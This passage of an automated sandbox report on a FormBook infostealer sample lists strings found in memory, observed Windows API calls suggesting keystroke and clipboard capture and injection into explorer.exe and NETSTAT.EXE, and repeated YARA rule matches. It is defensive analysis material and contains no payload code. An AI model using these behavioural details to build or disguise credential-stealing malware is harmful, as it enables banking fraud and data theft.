          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 0_2_00420CC0 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 0_2_0043DD3C GetKeyboardState

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 0_2_00440CB8 NtdllDefWindowProc_A,GetCapture
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 0_2_0045BA98 NtdllDefWindowProc_A
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 0_2_0045C240 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 0_2_0045C2F0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 0_2_0042A524 NtdllDefWindowProc_A
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 0_2_00450C40 GetSubMenu,SaveDC,RestoreDC,7344B080,SaveDC,RestoreDC,NtdllDefWindowProc_A
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00417940 NtCreateFile
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_004179F0 NtReadFile
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00417A70 NtClose
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00417B20 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_004178FA NtCreateFile
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_0041793A NtCreateFile
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_004179EA NtReadFile
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF9A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF9A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF95D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF9540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF9FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF98A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF9820 NtEnumerateKey
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AFB040 NtSuspendThread
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF99D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF9950 NtQueueApcThread
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF9A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF9A10 NtQuerySection
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AFA3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF9B00 NtSetValueKey
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AF95F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9520 NtWaitForSingleObject,1_2_00AF9520
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AFAD30 NtSetContextThread,1_2_00AFAD30
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9560 NtWriteFile,1_2_00AF9560
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF96D0 NtCreateKey,1_2_00AF96D0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9610 NtEnumerateValueKey,1_2_00AF9610
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9670 NtQueryInformationProcess,1_2_00AF9670
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9650 NtQueryValueKey,1_2_00AF9650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D87A70 NtClose,5_2_02D87A70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D87B20 NtAllocateVirtualMemory,5_2_02D87B20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D879F0 NtReadFile,5_2_02D879F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D87940 NtCreateFile,5_2_02D87940
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D878FA NtCreateFile,5_2_02D878FA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D879EA NtReadFile,5_2_02D879EA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D8793A NtCreateFile,5_2_02D8793A
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 0_2_00450C40
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 0_2_00455F90
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00401026
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_0041B10C
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00408A50
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_0041BB67
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00402D87
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_0041ADA4
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_0041BF77
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AE20A0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00B820A8
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00ACB090
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00B828EC
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00B8E824
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00B71002
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AD4120
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00ABF900
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00B822AE
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AEEBB0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00B7DBD2
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00B703DA
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00B82B28
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AC841F
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00B7D466
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AE2581
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00ACD5E0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00B825DD
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AB0D20
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00B82D07
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00B81D55
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00B82EF7
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00AD6E30
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00B7D616
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: 1_2_00B81FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02D78A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02D8BB67
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02D8B10C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02D72FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02D8BF77
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02D8AD9D
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02D72D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_02D72D87
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: String function: 00403FC0 appears 68 times
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: String function: 00ABB150 appears 45 times
          Source: C:\Users\user\Desktop\mp0nMsMroT.exe | Code function: String function: 004060D4 appears 62 times
          Source: mp0nMsMroT.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: mp0nMsMroT.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: mp0nMsMroT.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: mp0nMsMroT.exe, 00000000.00000002.184868899.0000000002140000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs mp0nMsMroT.exe
          Source: mp0nMsMroT.exe, 00000000.00000002.184880166.0000000002150000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs mp0nMsMroT.exe
          Source: mp0nMsMroT.exe, 00000001.00000002.232810465.0000000000D3F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs mp0nMsMroT.exe
          Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
